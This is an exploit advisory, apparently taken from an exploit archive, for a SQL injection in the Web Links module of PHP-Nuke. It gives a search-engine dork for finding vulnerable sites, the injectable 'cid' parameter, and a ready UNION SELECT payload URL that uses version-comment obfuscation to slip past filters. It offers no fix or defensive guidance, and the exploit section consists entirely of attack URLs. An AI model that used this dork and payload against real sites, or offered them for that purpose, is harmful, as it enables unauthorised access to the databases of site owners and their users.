id: 22268
date: 05/19/2014
title: PHP-Nuke Web Links SQL Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

PHP-Nuke module(Web Links) - Sql Injection Vulnerabilty
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : https://www.phpnuke.org/
.:. Dork           : inurl:"modules.php?op=" & "name=Web_Links"
####################################################################

#########
EXPLOIT
#########
Type:  Mysql Injection

http://SITE/modules.php?op=modload&name=Web_Links&file=index&req=viewlink&cid=[SQLINJECTION]

http://SITE/modules.php?op=modload&name=Web_Links&file=index&req=viewlink&cid=-1+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,2

####################################################################

#  0day.today [2023-03-23]  #